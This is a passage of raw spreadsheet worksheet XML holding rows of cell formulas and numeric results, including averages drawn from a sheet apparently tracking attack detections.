        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="CK123" s="518">
        <f t="shared" si="186"/>
        <v>14</v>
      </c>
      <c r="CL123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="CM123" s="518">
        <f t="shared" si="186"/>
        <v>6</v>
      </c>
      <c r="CN123" s="518">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="CO123" s="518">
        <f t="shared" si="186"/>
        <v>2.166666667</v>
      </c>
      <c r="CP123" s="518">
        <f t="shared" si="186"/>
        <v>14.5</v>
      </c>
      <c r="CQ123" s="518">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="CR123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="CS123" s="518">
        <f t="shared" si="186"/>
        <v>0.1326669443</v>
      </c>
      <c r="CT123" s="518">
        <f t="shared" si="186"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="CV123" s="518">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="CW123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="CX123" s="518">
        <f t="shared" si="186"/>
        <v>3.5</v>
      </c>
      <c r="CY123" s="518">
        <f t="shared" si="186"/>
        <v>3.764705882</v>
      </c>
      <c r="CZ123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="DA123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="DB123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="DC123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="DD123" s="518">
        <f t="shared" si="186"/>
        <v>7</v>
      </c>
      <c r="DE123" s="518">
        <f t="shared" si="186"/>
        <v>0.8</v>
      </c>
      <c r="DF123" s="518">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="DG123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="DH123" s="518">
        <f t="shared" si="186"/>
        <v>0.04888888889</v>
      </c>
      <c r="DI123" s="518">
        <f t="shared" si="186"/>
        <v>1.050303085</v>
      </c>
      <c r="DJ123" s="519">
        <f t="shared" si="186"/>
        <v>0.8181818182</v>
      </c>
      <c r="DK123" s="271"/>
      <c r="EG123" s="279"/>
      <c r="EH123" s="271"/>
      <c r="EI123" s="271"/>
      <c r="EJ123" s="271"/>
      <c r="EK123" s="271"/>
      <c r="EL123" s="271"/>
      <c r="EM123" s="271"/>
      <c r="ER123" s="271"/>
      <c r="ES123" s="271"/>
      <c r="ET123" s="271"/>
      <c r="EU123" s="271"/>
      <c r="EV123" s="271"/>
      <c r="EW123" s="271"/>
      <c r="EX123" s="271"/>
      <c r="EY123" s="271"/>
      <c r="EZ123" s="271"/>
      <c r="FA123" s="280"/>
    </row>
    <row r="124">
      <c r="J124" s="277"/>
      <c r="K124" s="500">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BR3:BR139)</f>
        <v>82.2387988</v>
      </c>
      <c r="L124" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DH3:DH139)</f>
        <v>2146.371721</v>
      </c>
      <c r="M124" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EX3:EX139)</f>
        <v>58078.89242</v>
      </c>
      <c r="N124" s="502">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GN3:GN139)</f>
        <v>63932.20822</v>
      </c>
      <c r="O124" s="278"/>
      <c r="Q124" s="271"/>
      <c r="R124" s="352" t="s">
        <v>2546</v>
      </c>
      <c r="S124" s="501">
        <f t="shared" ref="S124:V124" si="187">S76/S$31</f>
        <v>0.2727606192</v>
      </c>
      <c r="T124" s="501">
        <f t="shared" si="187"/>
        <v>0.004526034314</v>
      </c>
      <c r="U124" s="501">
        <f t="shared" si="187"/>
        <v>1.333333333</v>
      </c>
      <c r="V124" s="501">
        <f t="shared" si="187"/>
        <v>2.842105263</v>
      </c>
      <c r="W124" s="501">
        <f t="shared" si="104"/>
        <v>14</v>
      </c>
      <c r="X124" s="501">
        <f t="shared" ref="X124:AF124" si="188">X76/X$31</f>
        <v>1688</v>
      </c>
      <c r="Y124" s="501">
        <f t="shared" si="188"/>
        <v>59.28571429</v>
      </c>
      <c r="Z124" s="501">
        <f t="shared" si="188"/>
        <v>17.9505488</v>
      </c>
      <c r="AA124" s="501">
        <f t="shared" si="188"/>
        <v>0.08933717579</v>
      </c>
      <c r="AB124" s="501">
        <f t="shared" si="188"/>
        <v>8.782608696</v>
      </c>
      <c r="AC124" s="501">
        <f t="shared" si="188"/>
        <v>2.9</v>
      </c>
      <c r="AD124" s="501">
        <f t="shared" si="188"/>
        <v>0.01193948107</v>
      </c>
      <c r="AE124" s="501">
        <f t="shared" si="188"/>
        <v>0.3333333333</v>
      </c>
      <c r="AF124" s="502">
        <f t="shared" si="188"/>
        <v>0.5201042119</v>
      </c>
      <c r="AG124" s="271"/>
      <c r="AH124" s="352" t="s">
        <v>2546</v>
      </c>
      <c r="AI124" s="518">
        <f t="shared" ref="AI124:DJ124" si="189">IF(AI$30=0,"-",AI76/AI$31)</f>
        <v>0.2722201835</v>
      </c>
      <c r="AJ124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="AK124" s="518">
        <f t="shared" si="189"/>
        <v>2.25</v>
      </c>
      <c r="AL124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="AM124" s="518">
        <f t="shared" si="189"/>
        <v>0.004526034314</v>
      </c>
      <c r="AN124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="AO124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="AP124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="AQ124" s="518">
        <f t="shared" si="189"/>
        <v>1.384615385</v>
      </c>
      <c r="AR124" s="518">
        <f t="shared" si="189"/>
        <v>0.25</v>
      </c>
      <c r="AS124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="AT124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="AU124" s="518">
        <f t="shared" si="189"/>
        <v>1.5</v>
      </c>
      <c r="AV124" s="518">
        <f t="shared" si="189"/>
        <v>1</v>
      </c>
      <c r="AW124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="AX124" s="518">
        <f t="shared" si="189"/>
        <v>2.375</v>
      </c>
      <c r="AY124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="AZ124" s="518">
        <f t="shared" si="189"/>
        <v>1</v>
      </c>
      <c r="BA124" s="518">
        <f t="shared" si="189"/>
        <v>14</v>
      </c>
      <c r="BB124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="BC124" s="518">
        <f t="shared" si="189"/>
        <v>6189.333333</v>
      </c>
      <c r="BD124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="BE124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="BF124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="BG124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="BH124" s="518">
        <f t="shared" si="189"/>
        <v>396</v>
      </c>
      <c r="BI124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="BJ124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="BK124" s="518">
        <f t="shared" si="189"/>
        <v>6.333333333</v>
      </c>
      <c r="BL124" s="518">
        <f t="shared" si="189"/>
        <v>1</v>
      </c>
      <c r="BM124" s="518">
        <f t="shared" si="189"/>
        <v>45.4808627</v>
      </c>
      <c r="BN124" s="518">
        <f t="shared" si="189"/>
        <v>0.4577220077</v>
      </c>
      <c r="BO124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="BP124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="BQ124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="BR124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="BS124" s="518">
        <f t="shared" si="189"/>
        <v>6</v>
      </c>
      <c r="BT124" s="518">
        <f t="shared" si="189"/>
        <v>2</v>
      </c>
      <c r="BU124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="BV124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="BW124" s="518">
        <f t="shared" si="189"/>
        <v>4</v>
      </c>
      <c r="BX124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="BY124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="BZ124" s="518">
        <f t="shared" si="189"/>
        <v>0.0406504065</v>
      </c>
      <c r="CA124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="CB124" s="518">
        <f t="shared" si="189"/>
        <v>1</v>
      </c>
      <c r="CC124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="CD124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="CE124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="CF124" s="518">
        <f t="shared" si="189"/>
        <v>4</v>
      </c>
      <c r="CG124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="CH124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="CI124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="CJ124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="CK124" s="518">
        <f t="shared" si="189"/>
        <v>5</v>
      </c>
      <c r="CL124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="CM124" s="518">
        <f t="shared" si="189"/>
        <v>79.5</v>
      </c>
      <c r="CN124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="CO124" s="518">
        <f t="shared" si="189"/>
        <v>1.333333333</v>
      </c>
      <c r="CP124" s="518">
        <f t="shared" si="189"/>
        <v>9</v>
      </c>
      <c r="CQ124" s="518">
        <f t="shared" si="189"/>
        <v>3</v>
      </c>
      <c r="CR124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="CS124" s="518">
        <f t="shared" si="189"/>
        <v>0.01187005414</v>
      </c>
      <c r="CT124" s="518">
        <f t="shared" si="189"/>
        <v>0.005988023952</v>
      </c>
      <c r="CU124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="CV124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="CW124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="CX124" s="518">
        <f t="shared" si="189"/>
        <v>5.5</v>
      </c>
      <c r="CY124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="CZ124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="DA124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="DB124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="DC124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="DD124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="DE124" s="518">
        <f t="shared" si="189"/>
        <v>1.6</v>
      </c>
      <c r="DF124" s="518">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="DG124" s="518" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="DH124" s="518">
        <f t="shared" si="189"/>
        <v>1.013333333</v>
      </c>
      <c r="DI124" s="518">
        <f t="shared" si="189"/>
        <v>0.4980548267</v>
      </c>
      <c r="DJ124" s="519">
        <f t="shared" si="189"/>
        <v>1.272727273</v>
      </c>
      <c r="DK124" s="271"/>
      <c r="EG124" s="279"/>
      <c r="EH124" s="271"/>
      <c r="EI124" s="271"/>
      <c r="EJ124" s="271"/>
      <c r="EK124" s="271"/>
      <c r="EL124" s="271"/>
      <c r="EM124" s="271"/>
      <c r="EN124" s="271"/>
      <c r="EO124" s="271"/>
      <c r="EP124" s="271"/>
      <c r="EQ124" s="271"/>
      <c r="ER124" s="271"/>
      <c r="ES124" s="271"/>
      <c r="ET124" s="271"/>
      <c r="EU124" s="271"/>
      <c r="EV124" s="271"/>
      <c r="EW124" s="271"/>
      <c r="EX124" s="271"/>
      <c r="EY124" s="271"/>
      <c r="EZ124" s="271"/>
      <c r="FA124" s="280"/>
    </row>
    <row r="125">
      <c r="J125" s="277"/>
      <c r="K125" s="434"/>
      <c r="L125" s="353"/>
      <c r="M125" s="353"/>
      <c r="N125" s="354"/>
      <c r="O125" s="278"/>
      <c r="Q125" s="271"/>
      <c r="R125" s="352" t="s">
        <v>2547</v>
      </c>
      <c r="S125" s="501">
        <f t="shared" ref="S125:V125" si="190">S77/S$31</f>
        <v>0.2722470839</v>
      </c>
      <c r="T125" s="501">
        <f t="shared" si="190"/>
        <v>0.004526034314</v>
      </c>
      <c r="U125" s="501">
        <f t="shared" si="190"/>
        <v>1.333333333</v>
      </c>
      <c r="V125" s="501">
        <f t="shared" si="190"/>
        <v>2.842105263</v>
      </c>
      <c r="W125" s="501">
        <f t="shared" si="104"/>
        <v>14</v>
      </c>
      <c r="X125" s="501">
        <f t="shared" ref="X125:AF125" si="191">X77/X$31</f>
        <v>0</v>
      </c>
      <c r="Y125" s="501">
        <f t="shared" si="191"/>
        <v>2.714285714</v>
      </c>
      <c r="Z125" s="501">
        <f t="shared" si="191"/>
        <v>17.9505488</v>
      </c>
      <c r="AA125" s="501">
        <f t="shared" si="191"/>
        <v>0.07492795389</v>
      </c>
      <c r="AB125" s="501">
        <f t="shared" si="191"/>
        <v>8.782608696</v>
      </c>
      <c r="AC125" s="501">
        <f t="shared" si="191"/>
        <v>2.9</v>
      </c>
      <c r="AD125" s="501">
        <f t="shared" si="191"/>
        <v>0.01182994455</v>
      </c>
      <c r="AE125" s="501">
        <f t="shared" si="191"/>
        <v>0.3333333333</v>
      </c>
      <c r="AF125" s="502">
        <f t="shared" si="191"/>
        <v>0.5201042119</v>
      </c>
      <c r="AG125" s="271"/>
      <c r="AH125" s="352" t="s">
        <v>2547</v>
      </c>
      <c r="AI125" s="518">
        <f t="shared" ref="AI125:DJ125" si="192">IF(AI$30=0,"-",AI77/AI$31)</f>
        <v>0.271706422</v>
      </c>
      <c r="AJ125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="AK125" s="518">
        <f t="shared" si="192"/>
        <v>2.25</v>
      </c>
      <c r="AL125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="AM125" s="518">
        <f t="shared" si="192"/>
        <v>0.004526034314</v>
      </c>
      <c r="AN125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="AO125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="AP125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="AQ125" s="518">
        <f t="shared" si="192"/>
        <v>1.384615385</v>
      </c>
      <c r="AR125" s="518">
        <f t="shared" si="192"/>
        <v>0.25</v>
      </c>
      <c r="AS125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="AT125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="AU125" s="518">
        <f t="shared" si="192"/>
        <v>1.5</v>
      </c>
      <c r="AV125" s="518">
        <f t="shared" si="192"/>
        <v>1</v>
      </c>
      <c r="AW125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="AX125" s="518">
        <f t="shared" si="192"/>
        <v>2.375</v>
      </c>
      <c r="AY125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="AZ125" s="518">
        <f t="shared" si="192"/>
        <v>1</v>
      </c>
      <c r="BA125" s="518">
        <f t="shared" si="192"/>
        <v>14</v>
      </c>
      <c r="BB125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="BC125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="BD125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="BE125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="BF125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="BG125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="BH125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="BI125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="BJ125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="BK125" s="518">
        <f t="shared" si="192"/>
        <v>6.333333333</v>
      </c>
      <c r="BL125" s="518">
        <f t="shared" si="192"/>
        <v>1</v>
      </c>
      <c r="BM125" s="518">
        <f t="shared" si="192"/>
        <v>45.4808627</v>
      </c>
      <c r="BN125" s="518">
        <f t="shared" si="192"/>
        <v>0.4577220077</v>
      </c>
      <c r="BO125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="BP125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="BQ125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="BR125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="BS125" s="518">
        <f t="shared" si="192"/>
        <v>6</v>
      </c>
      <c r="BT125" s="518">
        <f t="shared" si="192"/>
        <v>2</v>
      </c>
      <c r="BU125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="BV125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="BW125" s="518">
        <f t="shared" si="192"/>
        <v>4</v>
      </c>
      <c r="BX125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="BY125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="BZ125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="CA125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="CB125" s="518">
        <f t="shared" si="192"/>
        <v>1</v>
      </c>
      <c r="CC125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="CD125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="CE125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="CF125" s="518">
        <f t="shared" si="192"/>
        <v>4</v>
      </c>
      <c r="CG125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="CH125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="CI125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="CJ125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="CK125" s="518">
        <f t="shared" si="192"/>
        <v>5</v>
      </c>
      <c r="CL125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="CM125" s="518">
        <f t="shared" si="192"/>
        <v>79.5</v>
      </c>
      <c r="CN125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="CO125" s="518">
        <f t="shared" si="192"/>
        <v>1.333333333</v>
      </c>
      <c r="CP125" s="518">
        <f t="shared" si="192"/>
        <v>9</v>
      </c>
      <c r="CQ125" s="518">
        <f t="shared" si="192"/>
        <v>3</v>
      </c>
      <c r="CR125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="CS125" s="518">
        <f t="shared" si="192"/>
        <v>0.01181452173</v>
      </c>
      <c r="CT125" s="518">
        <f t="shared" si="192"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="CV125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="CW125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="CX125" s="518">
        <f t="shared" si="192"/>
        <v>5.5</v>
      </c>
      <c r="CY125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="CZ125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="DA125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="DB125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="DC125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="DD125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="DE125" s="518">
        <f t="shared" si="192"/>
        <v>1.6</v>
      </c>
      <c r="DF125" s="518">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="DG125" s="518" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="DH125" s="518">
        <f t="shared" si="192"/>
        <v>1.013333333</v>
      </c>
      <c r="DI125" s="518">
        <f t="shared" si="192"/>
        <v>0.4980548267</v>
      </c>
      <c r="DJ125" s="519">
        <f t="shared" si="192"/>
        <v>1.272727273</v>
      </c>
      <c r="DK125" s="271"/>
      <c r="EG125" s="279"/>
      <c r="EH125" s="271"/>
      <c r="EI125" s="271"/>
      <c r="EJ125" s="271"/>
      <c r="EK125" s="271"/>
      <c r="EL125" s="271"/>
      <c r="EM125" s="271"/>
      <c r="EN125" s="271"/>
      <c r="EO125" s="271"/>
      <c r="EP125" s="271"/>
      <c r="EQ125" s="271"/>
      <c r="ER125" s="271"/>
      <c r="ES125" s="271"/>
      <c r="ET125" s="271"/>
      <c r="EU125" s="271"/>
      <c r="EV125" s="271"/>
      <c r="EW125" s="271"/>
      <c r="EX125" s="271"/>
      <c r="EY125" s="271"/>
      <c r="EZ125" s="271"/>
      <c r="FA125" s="280"/>
    </row>
    <row r="126">
      <c r="J126" s="277"/>
      <c r="K126" s="352" t="s">
        <v>2584</v>
      </c>
      <c r="L126" s="403" t="s">
        <v>2585</v>
      </c>
      <c r="M126" s="403" t="s">
        <v>2586</v>
      </c>
      <c r="N126" s="404" t="s">
        <v>2587</v>
      </c>
      <c r="O126" s="278"/>
      <c r="Q126" s="271"/>
      <c r="R126" s="352" t="s">
        <v>2548</v>
      </c>
      <c r="S126" s="501">
        <f t="shared" ref="S126:V126" si="193">S78/S$31</f>
        <v>2.163597682</v>
      </c>
      <c r="T126" s="501">
        <f t="shared" si="193"/>
        <v>0.04068729619</v>
      </c>
      <c r="U126" s="501">
        <f t="shared" si="193"/>
        <v>3.373015873</v>
      </c>
      <c r="V126" s="501">
        <f t="shared" si="193"/>
        <v>6.947368421</v>
      </c>
      <c r="W126" s="501">
        <f t="shared" si="104"/>
        <v>40</v>
      </c>
      <c r="X126" s="501">
        <f t="shared" ref="X126:AF126" si="194">X78/X$31</f>
        <v>1711.909091</v>
      </c>
      <c r="Y126" s="501">
        <f t="shared" si="194"/>
        <v>140.4285714</v>
      </c>
      <c r="Z126" s="501">
        <f t="shared" si="194"/>
        <v>71.37755222</v>
      </c>
      <c r="AA126" s="501">
        <f t="shared" si="194"/>
        <v>0.6714697406</v>
      </c>
      <c r="AB126" s="501">
        <f t="shared" si="194"/>
        <v>18.04347826</v>
      </c>
      <c r="AC126" s="501">
        <f t="shared" si="194"/>
        <v>16.3</v>
      </c>
      <c r="AD126" s="501">
        <f t="shared" si="194"/>
        <v>0.05783528445</v>
      </c>
      <c r="AE126" s="501">
        <f t="shared" si="194"/>
        <v>3.958333333</v>
      </c>
      <c r="AF126" s="502">
        <f t="shared" si="194"/>
        <v>0.6083369518</v>
      </c>
      <c r="AG126" s="271"/>
      <c r="AH126" s="352" t="s">
        <v>2548</v>
      </c>
      <c r="AI126" s="518">
        <f t="shared" ref="AI126:DJ126" si="195">IF(AI$30=0,"-",AI78/AI$31)</f>
        <v>2.161908257</v>
      </c>
      <c r="AJ126" s="518">
        <f t="shared" si="195"/>
        <v>5</v>
      </c>
      <c r="AK126" s="518">
        <f t="shared" si="195"/>
        <v>7.5</v>
      </c>
      <c r="AL126" s="518">
        <f t="shared" si="195"/>
        <v>1</v>
      </c>
      <c r="AM126" s="518">
        <f t="shared" si="195"/>
        <v>0.04068729619</v>
      </c>
      <c r="AN126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="AO126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="AP126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="AQ126" s="518">
        <f t="shared" si="195"/>
        <v>2.213675214</v>
      </c>
      <c r="AR126" s="518">
        <f t="shared" si="195"/>
        <v>4</v>
      </c>
      <c r="AS126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="AT126" s="518">
        <f t="shared" si="195"/>
        <v>56</v>
      </c>
      <c r="AU126" s="518">
        <f t="shared" si="195"/>
        <v>39</v>
      </c>
      <c r="AV126" s="518">
        <f t="shared" si="195"/>
        <v>8</v>
      </c>
      <c r="AW126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="AX126" s="518">
        <f t="shared" si="195"/>
        <v>4.6875</v>
      </c>
      <c r="AY126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="AZ126" s="518">
        <f t="shared" si="195"/>
        <v>8.5</v>
      </c>
      <c r="BA126" s="518">
        <f t="shared" si="195"/>
        <v>40</v>
      </c>
      <c r="BB126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="BC126" s="518">
        <f t="shared" si="195"/>
        <v>6224.333333</v>
      </c>
      <c r="BD126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="BE126" s="518">
        <f t="shared" si="195"/>
        <v>150</v>
      </c>
      <c r="BF126" s="518">
        <f t="shared" si="195"/>
        <v>0.6666666667</v>
      </c>
      <c r="BG126" s="518">
        <f t="shared" si="195"/>
        <v>4</v>
      </c>
      <c r="BH126" s="518">
        <f t="shared" si="195"/>
        <v>796</v>
      </c>
      <c r="BI126" s="518">
        <f t="shared" si="195"/>
        <v>4</v>
      </c>
      <c r="BJ126" s="518">
        <f t="shared" si="195"/>
        <v>4</v>
      </c>
      <c r="BK126" s="518">
        <f t="shared" si="195"/>
        <v>9.666666667</v>
      </c>
      <c r="BL126" s="518">
        <f t="shared" si="195"/>
        <v>5</v>
      </c>
      <c r="BM126" s="518">
        <f t="shared" si="195"/>
        <v>80.85054678</v>
      </c>
      <c r="BN126" s="518">
        <f t="shared" si="195"/>
        <v>65.37007722</v>
      </c>
      <c r="BO126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="BP126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="BQ126" s="518">
        <f t="shared" si="195"/>
        <v>0.0637254902</v>
      </c>
      <c r="BR126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="BS126" s="518">
        <f t="shared" si="195"/>
        <v>18.5</v>
      </c>
      <c r="BT126" s="518">
        <f t="shared" si="195"/>
        <v>6</v>
      </c>
      <c r="BU126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="BV126" s="518">
        <f t="shared" si="195"/>
        <v>2</v>
      </c>
      <c r="BW126" s="518">
        <f t="shared" si="195"/>
        <v>14</v>
      </c>
      <c r="BX126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="BY126" s="518">
        <f t="shared" si="195"/>
        <v>3.333333333</v>
      </c>
      <c r="BZ126" s="518">
        <f t="shared" si="195"/>
        <v>0.2032520325</v>
      </c>
      <c r="CA126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="CB126" s="518">
        <f t="shared" si="195"/>
        <v>8</v>
      </c>
      <c r="CC126" s="518">
        <f t="shared" si="195"/>
        <v>4</v>
      </c>
      <c r="CD126" s="518">
        <f t="shared" si="195"/>
        <v>4</v>
      </c>
      <c r="CE126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="CF126" s="518">
        <f t="shared" si="195"/>
        <v>12</v>
      </c>
      <c r="CG126" s="518">
        <f t="shared" si="195"/>
        <v>1</v>
      </c>
      <c r="CH126" s="518">
        <f t="shared" si="195"/>
        <v>11</v>
      </c>
      <c r="CI126" s="518">
